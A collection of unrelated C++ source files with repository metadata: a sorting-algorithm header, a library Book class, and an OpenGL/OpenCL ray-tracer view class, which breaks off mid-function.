mFunctions.push_back(f);
}
}
_invalidateTable();
GPASSERT(!mFunctions.empty());
}
GPProducerUtils::~GPProducerUtils()
{
}
void GPProducerUtils::_invalidateTable()
{
set<const func*> validset;
for (auto f : mFunctions)
{
validset.insert(f.get());
}
for (auto f : mFunctions)
{
auto cacheTable = f->tables;
f->tables.clear();
for (auto p : cacheTable)
{
bool valid = true;
for (auto pf : p)
{
if (validset.find(pf) == validset.end())
{
valid = false;
break;
}
}
if (valid)
{
f->tables.push_back(p);
}
}
}
for (auto f : mFunctions)
{
for (auto t : f->tables)
{
GPASSERT(t.size() == f->childrenInputs.size());
}
}
}
vector<const GPProducerUtils::func*> GPProducerUtils::getFunctionsForOutput(TYPE t) const
{
return _getFunctionsForOutput(t, mFunctions);
}
vector<const GPProducerUtils::func*> GPProducerUtils::_getFunctionsForOutput(TYPE t, const std::vector<GPPtr<func>>& lists) const
{
vector<const GPProducerUtils::func*> result;
for (auto f : lists)
{
if (f->outputs.size() == 1 && t == f->outputs[0])
{
result.push_back(f.get());
}
}
return result;
}
|
5238e1fce104352fea5048858af8f34fa9d512bc | ac22fa551737e31cb3f83ca1d25b480361767c30 | /main/Algorithms.h | 70c81fd1efa2ce51a934bdc2ca424f28da016ad7 | [] | no_license | Ccuevas3410/Sorting-Algorithms | a61040602b8310e8b07dcc2b4ff361c379c3e8ec | 8970b14b3a2cdfffd529ce0363d2f9525aa5bf67 | refs/heads/master | 2020-05-09T15:55:58.793751 | 2019-04-15T23:08:35 | 2019-04-15T23:08:35 | 181,250,397 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 572 | h | Algorithms.h | #pragma once
// GLOBAL VARIABLES TO PASS TO RECURSIVE FUNCTIONS
extern int SWAPS;
extern int COMPARISONS;
class Algorithms
{
public:
Algorithms();
~Algorithms();
void swap(int &, int &);
void selectionSort(int*, int);
void insertionSort(int*, int);
void mergeSort(int *, int, int, int&, int&);
void merge(int*, int, int, int, int, int&, int&);
void quickSort(int*, int, int, int&, int&);
int partition(int*, int, int, int&, int&);
void heapSort(int*, int, int&, int&);
void heapDown(int*, int, int, int&, int&);
void printArr(int[], int);
};
|
2646efddb23aff4d120e29e0114adf15b086c945 | 88e18f396df6dc9bc3e45c106f560d0073438ef3 | /C++/General Projects/MorrisQp5/Book.cpp | d914bec7344f03b85c54a3e6e657d8d6e3144b91 | [] | no_license | qmorrissmu/SMU-projects | 3f6f65065fc57ed93d3711c9e179aa819d459481 | e3db5e573d8b62798c17da2ba50966601a39b742 | refs/heads/master | 2022-11-30T08:09:38.945346 | 2020-07-31T22:42:02 | 2020-07-31T22:42:02 | 269,765,659 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 2,744 | cpp | Book.cpp | #include "Book.h"
#include <string>
#include <iostream>
using namespace std;
Book::Book()
{
length = 0;
width = 0;
numberPages = 0;
area = 0;
}
//constructor for a book object
//whether rented or not, it has all these properties(width, height, author, ect)
Book::Book(int l,int w,int p,string last,string first,string t)
{
length = l;
width = w;
area = l * w;
numberPages = p;
authorLast = last;
authorFirst = first;
title = t;
rented = false;
}
//extra info tied to a book that has been rented
void Book::renterInfo(string rLast, string rFirst,int m,int d,int y)
{
returnYear = y;
returnMonth = m;
returnDay = d;
renterLast = rLast;
renterFirst = rFirst;
rented = true;
}
/*
Book::Book(string last,string first,int m,int d,int y,string t)
{
lastName = last;
firstName = first;
returnMonth = m;
returnDay = d;
returnYear = y;
title = t;
}
*/
int Book::getLength()
{
return length;
}
int Book::getWidth()
{
return width;
}
/*
char Book::getStatus()
{
return status;
}
*/
int Book::getArea()
{
return area;
}
int Book::getMonth()
{
return returnMonth;
}
int Book::getDay()
{
return returnDay;
}
int Book::getYear()
{
return returnYear;
}
string Book::getTitle()
{
return title;
}
int Book::getNumberPages()
{
return numberPages;
}
string Book::getRLast()
{
return renterLast;
}
string Book::getRFirst()
{
return renterFirst;
}
string Book::getAFirst()
{
return authorFirst;
}
string Book::getALast()
{
return authorLast;
}
void Book::returnBook()
{
rented = false;
}
bool Book::isRented()
{
return rented;
}
bool Book::compare(Book& nextBook)
{
if(this -> isRented())
{
if(returnYear < nextBook.returnYear)
{
return true;
}
else if(returnMonth < nextBook.returnYear && returnYear == nextBook.returnYear)
{
return true;
}
else if(returnDay < nextBook.returnDay && returnMonth == nextBook.returnMonth && returnYear == nextBook.returnYear)
{
return true;
}
else
{
return false;
}
}
else
{
if(this -> getArea() < nextBook.getArea())
{
return false;
}
else if(this -> getArea() == nextBook.getArea() && this -> getNumberPages() < nextBook.getNumberPages())
{
return false;
}
else
{
return true;
}
}
}
string Book::onLoan()
{
if(this -> isRented())
{
cout << title << " loaned to " << renterFirst << " " << renterLast << endl;
}
else
{
cout << title << " by " << authorFirst << " " << authorLast << "(" << length << "x" << width << ", " << numberPages << " p)" << endl;
}
return title;
}
|
2744a5ab7c13a3b3d3a9e148d655e4bb5ffa8632 | 3ffa9722d08313479d9199684ea8f16b312d4f64 | /support/view3d.cpp | 28152498bd6a755762ddc9ad55204d3822604d53 | [] | no_license | lygood2007/Test | af2d1059b83326ec4190c5fd55859e97110f39e9 | d8694f54f2db2203452218d0e7f83f5263c8b062 | refs/heads/master | 2021-01-20T21:53:09.405440 | 2014-09-15T05:58:55 | 2014-09-15T05:58:55 | null | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 34,886 | cpp | view3d.cpp | #include "view3d.h"
#include <QApplication>
#include <QKeyEvent>
#include <QGLFramebufferObject>
#include <QGLShaderProgram>
#include <QMouseEvent>
#include "scene.h"
#include "CS123XmlSceneParser.h"
#include "camtrans_camera.h"
#include "assert.h"
#include "shape_draw.h"
#include "utils.h"
#include "resource_loader.h"
#include "GPUrayscene.h"
#include <sstream>
#include "GL/glx.h"
#include "kdtree.h"
// CL includes
#include "CL/cl.h"
#include "oclUtils.h"
#include "clDumpGPUInfo.h"
extern "C" {
void glBindBuffer (GLenum target, GLuint buffer);
void glGenBuffers (GLsizei n, GLuint *buffers);
void glBufferData (GLenum target, GLsizeiptr size, const GLvoid *data, GLenum usage);
void glBufferSubData( GLenum target,GLintptr offset, GLsizeiptr size,const GLvoid * data);
void glGetBufferParameteriv( GLenum target, GLenum value, GLint * data);
void glDeleteBuffers( GLsizei n, const GLuint* buffers );
}
//extern int cubeTess;
//extern void buildCubeVBO( int tess, GLuint &vbo, GLuint &vboIndex );
// use cout and cin from std
using std::cout;
using std::cerr;
using std::endl;
using std::stringstream;
static CamtransCamera test;
static const char* clVectorAdd = "./OpenCL/shader/testVecAdd.cl";
static const char* clRayTraceGPU = "./OpenCL/shader/raytraceGPU.cl";
static const char* fontBMP = "./resource/Font.bmp";
static void checkCameraMatrix( CamtransCamera* transCam, OrbitCamera* orCam )
{
Vector4 eye = orCam->getEyePos();
cout<<"Eye pos:"<<endl;
cout<<eye.x<<" "<<eye.y<<" "<<eye.z<<endl;
Vector3 dir = orCam->getDir();
Vector3 up = orCam->getUp();
transCam->orientLook( eye, Vector4( dir.x, dir.y, dir.z, 0 ), Vector4(up.x, up.y, up.z,0));
transCam->setProjection( orCam->getRatio(), orCam->getNear(), orCam->getFar(), orCam->getFOV() );
Matrix4x4 proj1 = transCam->getProjectionMatrix();
Matrix4x4 modv1 = transCam->getModelviewMatrix();
Matrix4x4 invView1 = transCam->getInvViewTransMatrix();
Matrix4x4 proj2 = orCam->getProjectionMatrix();
Matrix4x4 modv2 = orCam->getModelviewMatrix();
Matrix4x4 invView2 = transCam->getInvViewTransMatrix();
printMat4x4( "Camtrans: projection", invView1 );
printMat4x4( "Orbit: projection", invView2 );
assert( 0 );
}
static GLuint testTexture;
/**
Constructor, initliazation is done here
**/
View3D::View3D(QWidget *parent) : QGLWidget(parent),
m_timer(this),m_prevTime(0), m_prevFps(0.f), m_fps(0.f)
{
this->context();
// View3D needs all mouse move events, not just mouse drag events
setMouseTracking(true);
// View3D needs keyboard focus
setFocusPolicy(Qt::StrongFocus);
// The game loop is implemented using a timer
connect(&m_timer, SIGNAL(timeout()), this, SLOT(tick()));
m_clock.start();
// The initilization of camera settings
m_mouseLeftDown = false;
m_mouseRightDown = false;
m_mouseMiddleDown = false;
m_curShape = 0;
m_supportGPU = false;
m_gpuActivated = false;
m_scene = NULL;
m_quad = NULL;
m_gpuscene = NULL;
// fix the size of the window
setFixedSize(WIN_WIDTH,WIN_HEIGHT);
m_camera.setRatio((float)WIN_WIDTH/(float)WIN_HEIGHT);
//checkCameraMatrix( &test, &m_camera );
}
/**
Destructor, release all the pointers
**/
View3D::~View3D()
{
if( m_scene )
{
delete m_scene;
}
if( m_gpuscene )
{
delete m_gpuscene;
}
if( m_testTex != 0 )
glDeleteTextures(1, &m_testTex );
if( m_screenTex != 0 )
glDeleteTextures( 1, &m_screenTex );
if( m_quad )
gluDeleteQuadric( m_quad );
releaseShapes();
deletePBO( &m_pbo );
releaseCL();
killFont();
}
Scene* View3D::loadScene( const QString& sceneName )
{
if (!sceneName.isNull())
{
CS123XmlSceneParser parser(qPrintable(sceneName));
if (parser.parse())
{
std::cerr << "Scene " << qPrintable(sceneName) << std::endl;
// Delete the old scene
if (m_scene)
{
delete m_scene;
}
if( m_gpuscene )
delete m_gpuscene;
Scene* newScene = new Scene;
Scene::parse(newScene, &parser);
// Set the camera for the new scene
CS123SceneCameraData camera_data;
if (parser.getCameraData(camera_data))
{
camera_data.pos.data[3] = 1;
camera_data.look.data[3] = 0;
camera_data.up.data[3] = 0;
// We get rid of the camera data because we always use
// Orbit camera
cout<<" We get rid of the camera data in the scene file"
<<" Because we always use orbit camera"<<endl;
}
m_scene = newScene;
if( settings.useKdTree )
m_scene->buildKdTree();
return m_scene;
}
else
{
QMessageBox::critical(this, "Error", "Could not load scene \"" + sceneName + "\"");
return NULL;
}
}
return NULL;
}
Scene* View3D::getScene()
{
return m_scene;
}
void View3D::traceScene()
{
}
void View3D::initCL()
{
// We firstly dump our gpu info
dumpGPUInfo();
cl_int ciErrNum;
// Get the platform
ciErrNum = oclGetPlatformID(&m_cl.m_platform );
if(ciErrNum != CL_SUCCESS )
{
cerr<<" Get platform ID failed in line:"<<__LINE__<<", File:"<<__FILE__<<endl;
m_supportGPU = false;
return;
}
// Get th enumber of GPU devices available to the platform
ciErrNum =clGetDeviceIDs( m_cl.m_platform,
CL_DEVICE_TYPE_GPU,
0,
NULL,
&m_cl.m_uiDevCount
);
if(ciErrNum != CL_SUCCESS )
{
cerr<<" Get device ids failed in line:"<<__LINE__<<", File:"<<__FILE__<<endl;
m_supportGPU = false;
return;
}
else
{
cout<<"There are "<<m_cl.m_uiDevCount<<" devices"<<endl;
}
if( m_cl.m_uiDevCount == 0 )
{
cerr<<"No device available in line:"<<__LINE__<<", File:"<<__FILE__<<endl;
m_supportGPU= false;
return;
}
else
{
m_cl.m_deviceList.resize( m_cl.m_uiDevCount );
ciErrNum = clGetDeviceIDs( m_cl.m_platform,
CL_DEVICE_TYPE_GPU,
m_cl.m_deviceList.size(),
m_cl.m_deviceList.data(),
NULL
);
if( ciErrNum != CL_SUCCESS )
{
cerr<<"Get device ids failed in line:"<<__LINE__<<", File:"<<__FILE__<<endl;
m_supportGPU = false;
return ;
}
cl_context_properties props[] = {
CL_GL_CONTEXT_KHR, (cl_context_properties)glXGetCurrentContext(),
CL_GLX_DISPLAY_KHR, (cl_context_properties)glXGetCurrentDisplay(),
CL_CONTEXT_PLATFORM,
(cl_context_properties)m_cl.m_platform,
0
};
cl_device_id device;
for( int i = 0; i < m_cl.m_deviceList.size(); i++ )
{
device = m_cl.m_deviceList.at( i );
m_cl.m_context = clCreateContext( props,
CL_DEVICE_TYPE_DEFAULT,
&device,
NULL,
NULL,
&ciErrNum
);
if( ciErrNum == CL_SUCCESS )
{
break;
}
}
if( ciErrNum != CL_SUCCESS || m_cl.m_context == NULL )
{
cerr<<"Get device context failed in line:"<<__LINE__<<", File:"<<__FILE__<<endl;
m_supportGPU = false;
return ;
}
else
{
m_cl.m_device = device;
// Dump gpu info
cout<<"We are going to use:"<<endl;
cout<<getPlatformName( m_cl.m_platform ).toStdString().c_str()<<": "<<getDeviceName( device ).toStdString().c_str()<<endl;
}
}
m_cl.m_queue =clCreateCommandQueue( m_cl.m_context, m_cl.m_device, 0, &ciErrNum );
if( ciErrNum != CL_SUCCESS )
{
cerr<<"Create command queue failed in line:"<<__LINE__<<", File:"<<__FILE__<<endl;
m_supportGPU = false;
return;
}
m_supportGPU = true;
if( settings.testCL )
{
// We test openCL using a small program to do vector add
testOpenCL();
}
else
{
initCLProgramAndKernel();
}
}
void View3D::releaseCL()
{
if( m_cl.m_queue )
{
clFinish( m_cl.m_queue );
clReleaseCommandQueue( m_cl.m_queue );
}
if ( m_cl.m_program )
clReleaseProgram(m_cl.m_program);
if ( m_cl.m_context )
clReleaseContext( m_cl.m_context );
if( m_cl.m_kernelRay )
clReleaseKernel( m_cl.m_kernelRay );
if( m_cl.m_cmPbo )
clReleaseMemObject( m_cl.m_cmPbo );
}
void View3D::initCLProgramAndKernel()
{
cl_int ciErrNum;
// create program firstly
size_t szProgramLength;
char* cSourceCL = oclLoadProgSource( clRayTraceGPU, "", &szProgramLength );
m_cl.m_program = clCreateProgramWithSource( m_cl.m_context,
1,
(const char**)&cSourceCL,
&szProgramLength,
&ciErrNum
);
if( ciErrNum != CL_SUCCESS )
{
cerr<<"Create program failed in line:"<<__LINE__<<", File:"<<__FILE__<<endl;
free( cSourceCL );
return ;
}
ciErrNum = clBuildProgram( m_cl.m_program, 1, &m_cl.m_device, NULL, NULL, NULL );
if( ciErrNum != CL_SUCCESS )
{
cerr<<"Build program failed in line:"<<__LINE__<<", File:"<<__FILE__<<endl;
cerr<<"The log is: "<<endl;
char* buildLog;
size_t logSize;
clGetProgramBuildInfo( m_cl.m_program, m_cl.m_device, CL_PROGRAM_BUILD_LOG, 0, NULL, &logSize );
buildLog = new char[logSize + 1];
clGetProgramBuildInfo( m_cl.m_program, m_cl.m_device, CL_PROGRAM_BUILD_LOG, logSize, buildLog, NULL );
buildLog[logSize + 1] = '\0';
cout<< buildLog << endl;
delete []buildLog;
free( cSourceCL );
return;
}
m_cl.m_cmPbo = clCreateFromGLBuffer( m_cl.m_context, CL_MEM_WRITE_ONLY, m_pbo, &ciErrNum );
if( ciErrNum != CL_SUCCESS )
{
cerr<<"Create buffer from GL failed in line:"<<__LINE__<<", File:"<<__FILE__<<endl;
free( cSourceCL );
return ;
}
// Create the kernel and setup the arguments
m_cl.m_kernelRay = clCreateKernel( m_cl.m_program, "raytrace", &ciErrNum );
if( ciErrNum != CL_SUCCESS )
{
cerr<<"Create kernel failed in line:"<<__LINE__<<", File:"<<__FILE__<<endl;
free( cSourceCL );
return ;
}
m_cl.m_localWorkSize[0] = GPU_LOCAL_WORK_SIZE_X;
m_cl.m_localWorkSize[1] = GPU_LOCAL_WORK_SIZE_Y;
m_cl.m_globalWorkSize[0] = shrRoundUp( m_cl.m_localWorkSize[0], WIN_WIDTH );
m_cl.m_globalWorkSize[1] = shrRoundUp( m_cl.m_localWorkSize[1], WIN_HEIGHT );
cout<<"Local work size"<<m_cl.m_localWorkSize[0]<<" "<<m_cl.m_localWorkSize[1]<<endl;
cout<<"Global work size"<<m_cl.m_globalWorkSize[0]<<" "<<m_cl.m_globalWorkSize[1]<<endl;
cout<<"Max work group item size is "<<CL_DEVICE_MAX_WORK_ITEM_SIZES;
if( m_cl.m_localWorkSize[0]*m_cl.m_localWorkSize[1] > CL_DEVICE_MAX_WORK_ITEM_SIZES )
{
cerr<<"Invalid local work size"<<endl;
free( cSourceCL );
return;
}
free( cSourceCL );
}
/**
Set up OpenGL and timer, load the resources.
**/
void View3D::initializeGL()
{
// All OpenGL initialization *MUST* be done during or after this
// method. Before this method is called, there is no active OpenGL
// context and all OpenGL calls have no effect.
// Set up OpenGLpaintgl
glEnable(GL_TEXTURE_2D);
glDisable(GL_DITHER);
glShadeModel(GL_SMOOTH);
glEnable(GL_DEPTH_TEST);
glDepthFunc( GL_LEQUAL );
glEnable(GL_CULL_FACE);
glCullFace(GL_BACK);
glEnable(GL_MULTISAMPLE);
glHint(GL_LINE_SMOOTH_HINT, GL_NICEST);
glHint(GL_POINT_SMOOTH_HINT, GL_NICEST);
glHint(GL_POLYGON_SMOOTH_HINT, GL_NICEST);
// Best perspective correction
glHint( GL_PERSPECTIVE_CORRECTION_HINT, GL_NICEST );
glClearColor(0.0f, 0.0f, 0.0f, 0.0f);
glEnable(GL_COLOR_MATERIAL);
glColorMaterial(GL_FRONT, GL_AMBIENT_AND_DIFFUSE);
glEnable(GL_LIGHTING);
// Light's color
GLfloat ambientColor[] = { 0.3f, 0.3f, 0.3f, 1.0f };
GLfloat diffuseColor[] = { 1.0f, 0.0f, 1.0, 1.0f };
GLfloat lightPosition[] = {0, 0, 0, 1.0f };
glLightfv(GL_LIGHT0, GL_AMBIENT, ambientColor);
glLightfv(GL_LIGHT0, GL_DIFFUSE, diffuseColor);
glLightfv(GL_LIGHT0, GL_POSITION, lightPosition);
glEnable(GL_LIGHT0);
m_timer.start(1000 / 60);
// Center the mouse, which is explained more in mouseMoveEvent() below.
// This needs to be done here because the mouse may be initially outside
// the fullscreen window and will not automatically receive mouse move
// events. This occurs if there are two monitors and the mouse is on the
// secondary monitor.
QCursor::setPos(mapToGlobal(QPoint(width() / 2, height() / 2)));
m_camera.updateMatrices();
m_camera.update( WIN_WIDTH, WIN_HEIGHT );
// Dump extensions
#ifdef DUMP_EXTENSION_INFO
char* extensions = strdup( (char*)glGetString(GL_EXTENSIONS) );
int len = strlen(extensions);
// Separate it by new line instead of space
for( int i = 0; i < len; i++ )
{
if( extensions[i] == ' ' )
extensions[i] = '\n';
}
cout<<"Extensions supported:"<<endl<< extensions<<endl;
if( isInString( extensions, "GL_ARB_multitexture" ) )
{
cout<<"Multi-texture supported"<<endl;
}
free( extensions );
#endif
//Initialize resources
initResources();
// Init CL settings, should be done after init resources
initCL();
}
void View3D::paintGL()
{
if( settings.testDrawShape )
{
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT);
//m_cone->glDrawVertex();
drawShape( (ShapeType)m_curShape, settings.drawNormals );
if( settings.showAxis )
{
//drawAxis();
}
}
else
{
if (settings.drawWireFrame || settings.drawNormals)
glClearColor(0.5f, 0.5f, 0.5f, 0.5f);
else
glClearColor(0, 0, 0, 0);
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT);
m_camera.update();
if( m_scene && !m_gpuActivated )
{
if( settings.showAxis )
{
drawAxis();
}
renderScene();
}
else
{
GPUrender();
}
}
paintText();
}
void View3D::backGPUScene()
{
if( m_scene )
m_gpuscene = new GPURayScene( &m_cl,
&m_camera,
m_scene,
m_screenTex,
m_pbo,
WIN_WIDTH,
WIN_HEIGHT );
}
void View3D::renderScene()
{
if( m_scene )
m_scene->render( this );
}
/**
when press the mouse, the force should be added to the velocity field
**/
void View3D::mousePressEvent(QMouseEvent *event)
{
if( event->button() == Qt::RightButton )
{
m_camera.mouseDown( event->x(),event->y() );
//m_camera.update( WIN_WIDTH, WIN_HEIGHT );
m_mouseRightDown = true;
}
else if( event->button() == Qt::LeftButton )
{
m_mouseLeftDown = true;
}
else if( event->button() == Qt::MiddleButton )
{
m_camera.mouseDown( event->x(),event->y() );
//m_camera.update( WIN_WIDTH, WIN_HEIGHT );
m_mouseMiddleDown = true;
}
}
/**
This function handles mouse move event
**/
void View3D::mouseMoveEvent(QMouseEvent *event)
{
// This starter code implements mouse capture, which gives the change in
// mouse position since the last mouse movement. The mouse needs to be
// recentered after every movement because it might otherwise run into
// the edge of the screen, which would stop the user from moving further
// in that direction. Note that it is important to check that deltaX and
// deltaY are not zero before recentering the mouse, otherwise there will
// be an infinite loop of mouse move events.
int deltaX = event->x() - width() / 2;
int deltaY = event->y() - height() / 2;
if (!deltaX && !deltaY) return;
if( m_mouseRightDown )
{
m_camera.mouseMove(event->x(),event->y());
m_camera.updateMatrices();
m_camera.update();
}
else if( m_mouseMiddleDown )
{
m_camera.mouseMovePan( event->x(), event->y() );
m_camera.updateMatrices();
m_camera.update();
}
}
/**
This function handles mouse release event
**/
void View3D::mouseReleaseEvent(QMouseEvent *event)
{
m_mouseLeftDown = false;
m_mouseRightDown = false;
m_mouseMiddleDown = false;
}
/**
This function handles mouse wheel event
**/
void View3D::wheelEvent(QWheelEvent *event)
{
m_camera.mouseWheel(event->delta());
m_camera.updateMatrices();
m_camera.update();
}
/**
This function handles key press event
**/
void View3D::keyPressEvent(QKeyEvent *event)
{
if (event->key() == Qt::Key_Escape)
{
QApplication::quit();
}
else if( event->key() == Qt::Key_L )
{
//glPolygonMode(GL_FRONT, GL_LINE);
}
else if( event->key() == Qt::Key_P )
{
//glPolygonMode(GL_FRONT, GL_POINT);
}
else if( event->key() == Qt::Key_W )
{
settings.drawWireFrame = !settings.drawWireFrame;
//glPolygonMode( GL_FRONT, GL_FILL );
}
else if( event->key() == Qt::Key_N )
{
settings.drawNormals = !settings.drawNormals;
}
else if( settings.testDrawShape && event->key() == Qt::Key_S )
{
m_curShape = (++m_curShape)%4;
}
else if( event->key() == Qt::Key_T )
{
settings.showTexture = !settings.showTexture;
if( m_gpuscene )
m_gpuscene->syncGlobalSettings();
}
else if( event->key() == Qt::Key_A )
{
settings.showAxis = !settings.showAxis;
}
else if( event->key() == Qt::Key_R )
{
settings.useReflection = !settings.useReflection;
if( m_gpuscene )
m_gpuscene->syncGlobalSettings();
}
else if( event->key() == Qt::Key_B )
{
settings.showBoundingBox = !settings.showBoundingBox;
}
else if( event->key() == Qt::Key_K )
{
settings.showKdTree = !settings.showKdTree;
}
}
/**
This function handles key release event
**/
void View3D::keyReleaseEvent(QKeyEvent *event)
{
}
/**
indeed no needs to use that, since the window is fixed, delete this later
@param width: the View3Dport width
@param height: the View3Dport height
**/
void View3D::resizeGL(int width, int height)
{
m_camera.setRatio((float)width/(float)height);
glViewport(0, 0, width, height);
}
/**
Draws text for the FPS and screenshot prompt
**/
void View3D::paintText()
{
glColor3f(1.f, 1.f, 1.f);
// Combine the previous and current framerate
if (m_fps >= 0 && m_fps < 1000)
{
m_prevFps *= 0.95f;
m_prevFps += m_fps * 0.05f;
}
glEnable(GL_BLEND );
glBlendFunc( GL_SRC_ALPHA, GL_ONE );
QString str;
str = "FPS: " + QString::number((int) (m_prevFps));
printText( 10, WIN_HEIGHT - 20, str.toStdString().c_str() , 0);
str = "Delta: " + QString::number((float) (m_delta));
printText(10, WIN_HEIGHT - 35, str.toStdString().c_str(), 0 );
stringstream ss;
ss<<"A: Show axis = "<<(settings.showAxis ? "true" : "false" );
str = ss.str().c_str();
printText(10,WIN_HEIGHT - 50, str.toStdString().c_str(), 0 );
ss.str("");
ss<<"W: Wireframe mode = "<<(settings.drawWireFrame ? "true" : "false" );
str = ss.str().c_str();
printText(10,WIN_HEIGHT - 65, str.toStdString().c_str(), 0 );
ss.str("");
ss<<"N: Show normal = "<<(settings.drawNormals ? "true" : "false" );
str = ss.str().c_str();
printText(10,WIN_HEIGHT - 80, str.toStdString().c_str(), 0 );
ss.str("");
ss<<"T: Show texture = "<<(settings.showTexture ? "true" : "false" );
str = ss.str().c_str();
printText(10,WIN_HEIGHT - 95, str.toStdString().c_str(), 0 );
ss.str("");
ss<<"B: Show bounding box = "<<(settings.showBoundingBox? "true" : "false" );
str = ss.str().c_str();
printText(10,WIN_HEIGHT - 110, str.toStdString().c_str(), 0 );
ss.str("");
ss<<"K: Show kdTree = "<<(settings.showKdTree? "true" : "false" );
str = ss.str().c_str();
printText(10,WIN_HEIGHT - 125, str.toStdString().c_str(), 0 );
ss.str("");
ss<<"R: Use recursive ray tracing = "<<(settings.useReflection ? "true" : "false" );
str = ss.str().c_str();
printText(10,WIN_HEIGHT - 140, str.toStdString().c_str(), 0 );
ss.str("");
glDisable( GL_BLEND );
}
void View3D::updateTime()
{
long time = m_clock.elapsed();
m_delta = (time-m_prevTime)/1000.f;
m_fps = 1000.f / (time-m_prevTime);
m_prevTime = time;
}
void View3D::drawAxis()
{
glColor3f(0, 0, 1);
gluCylinder(m_quad, 0.1, 0.1, 3, 10, 10); // Z
glPushMatrix();
glRotatef(90, 0, 1, 0);
glColor3f(1, 0, 0);
gluCylinder(m_quad, 0.1, 0.1, 3, 10, 10); // X
glPopMatrix();
glPushMatrix();
glRotatef(-90, 1, 0, 0);
glColor3f(0, 1, 0);
gluCylinder(m_quad, 0.1, 0.1, 3, 10, 10); // Y
glPopMatrix();
PRINT_GL_ERROR();
}
void View3D::initializeShapes()
{
buildCubeVBO( 2, m_vbos.cubeVBO, m_vbos.cubeElementVBO );
buildCylinderVBO( 24, m_vbos.cylinderVBO, m_vbos.cylinderElementVBO );
buildConeVBO( 24, m_vbos.coneVBO, m_vbos.coneElementVBO );
buildSphereVBO( 24, 24, m_vbos.sphereVBO, m_vbos.sphereElementVBO );
PRINT_GL_ERROR();
if( m_vbos.cubeVBO == 0 || m_vbos.cubeElementVBO == 0 )
cerr<<"The cube VBO is not initliazed correctly"<<endl;
if( m_vbos.cylinderVBO == 0 || m_vbos.cylinderElementVBO == 0 )
cerr<<"The cylinder VBO is not initliazed correctly"<<endl;
if( m_vbos.coneVBO == 0 || m_vbos.coneElementVBO == 0 )
cerr<<"The cone VBO is not initliazed correctly"<<endl;
if( m_vbos.sphereVBO == 0 || m_vbos.sphereElementVBO == 0 )
cerr<<"The sphere VBO is not initliazed correctly"<<endl;
}
void View3D::releaseShapes()
{
if( m_vbos.cubeVBO )
glDeleteBuffers( 1, &m_vbos.cubeVBO );
if( m_vbos.cylinderVBO )
glDeleteBuffers( 1, &m_vbos.cylinderVBO );
if( m_vbos.coneVBO )
glDeleteBuffers( 1, &m_vbos.coneVBO );
if( m_vbos.sphereVBO )
glDeleteBuffers( 1, &m_vbos.sphereVBO );
if( m_vbos.cubeElementVBO )
glDeleteBuffers( 1, &m_vbos.cubeElementVBO );
if( m_vbos.cylinderElementVBO )
glDeleteBuffers( 1, &m_vbos.cylinderElementVBO );
if( m_vbos.coneElementVBO )
glDeleteBuffers( 1, &m_vbos.coneElementVBO );
if( m_vbos.sphereElementVBO )
glDeleteBuffers( 1, &m_vbos.sphereElementVBO );
}
void View3D::initResources()
{
initializeShapes();
// m_testTex = loadTexture( "/home/liyan/Sumemr/GRAPHICS/gpu_ray/myscenes/textures/arrow.jpg" );
createPBO( &m_pbo, WIN_WIDTH, WIN_HEIGHT );
createTexture( &m_screenTex, WIN_WIDTH, WIN_HEIGHT );
m_quad =gluNewQuadric();
loadBMPTexture( &m_fontHandle, fontBMP );
genFontDisplayList();
}
void View3D::drawShape( ShapeType type, bool drawNorms )
{
switch( type )
{
case CUBE:
if( drawNorms )
{
drawNormals( m_vbos.cubeVBO, (cubeTess+1)*(cubeTess+1)*6 );
}
else
{
drawCube( m_vbos.cubeVBO, m_vbos.cubeElementVBO, testTexture );
}
break;
case CYLINDER:
if( drawNorms )
{
drawNormals( m_vbos.cylinderVBO, (cylinderTess+1)*4 );
}
else
{
drawCylinder( m_vbos.cylinderVBO, m_vbos.cylinderElementVBO, testTexture );
}
break;
case SPHERE:
if( drawNorms )
{
drawNormals( m_vbos.sphereVBO, (sphereTess[1]+1)*(sphereTess[0]+1) );
}
else
{
drawSphere( m_vbos.sphereVBO, m_vbos.sphereElementVBO, testTexture );
}
break;
case CONE:
if( drawNorms )
{
drawNormals( m_vbos.coneVBO, (coneTess+1)*3 );
}
else
{
drawCone( m_vbos.coneVBO, m_vbos.coneElementVBO, testTexture );
}
break;
default:
cerr<<"[drawShape] Invalid type"<<endl;
assert(0);
break;
}
}
void View3D::testOpenCL()
{
int iNumElements = 360000;
cl_int ciErrNum;
cl_program cpProgram;
cl_kernel ckKernel;
cl_mem cmDevSrcA;
cl_mem cmDevSrcB;
cl_mem cmDevDst;
size_t szGlobalWorkSize;
size_t szLocalWorkSize;
size_t szKernelLength;
char* cSourceCL = oclLoadProgSource( clVectorAdd, "", &szKernelLength );
cpProgram = clCreateProgramWithSource( m_cl.m_context,
1,
(const char**)&cSourceCL,
&szKernelLength,
&ciErrNum
);
if( ciErrNum != CL_SUCCESS )
{
cerr<<"Create program failed in line:"<<__LINE__<<", File:"<<__FILE__<<endl;
return;
}
char *flags = "-cl-fast-relaxed-math";
ciErrNum = clBuildProgram( cpProgram, 1, &m_cl.m_device, flags, NULL, NULL );
if( ciErrNum != CL_SUCCESS )
{
cerr<<"Build failed in line:"<<__LINE__<<", File:"<<__FILE__<<endl;
cerr<<"The log is: "<<endl;
char* buildLog;
size_t logSize;
clGetProgramBuildInfo( cpProgram, m_cl.m_device, CL_PROGRAM_BUILD_LOG, 0, NULL, &logSize );
buildLog = new char[logSize + 1];
clGetProgramBuildInfo( cpProgram, m_cl.m_device, CL_PROGRAM_BUILD_LOG, logSize, buildLog, NULL );
buildLog[logSize + 1] = '\0';
cout<< buildLog << endl;
delete []buildLog;
return;
}
szLocalWorkSize =256;
szGlobalWorkSize = shrRoundUp((int)szLocalWorkSize, iNumElements );
cmDevSrcA = clCreateBuffer( m_cl.m_context, CL_MEM_READ_ONLY, sizeof( cl_float)*szGlobalWorkSize, NULL, &ciErrNum);
if( ciErrNum != CL_SUCCESS )
{
cerr<<"create buffer failed in line:"<<__LINE__<<", File:"<<__FILE__<<endl;
return;
}
cmDevSrcB = clCreateBuffer( m_cl.m_context, CL_MEM_READ_ONLY, sizeof( cl_float)*szGlobalWorkSize, NULL, &ciErrNum );
if( ciErrNum != CL_SUCCESS )
{
cerr<<"create buffer failed in line:"<<__LINE__<<", File:"<<__FILE__<<endl;
return;
}
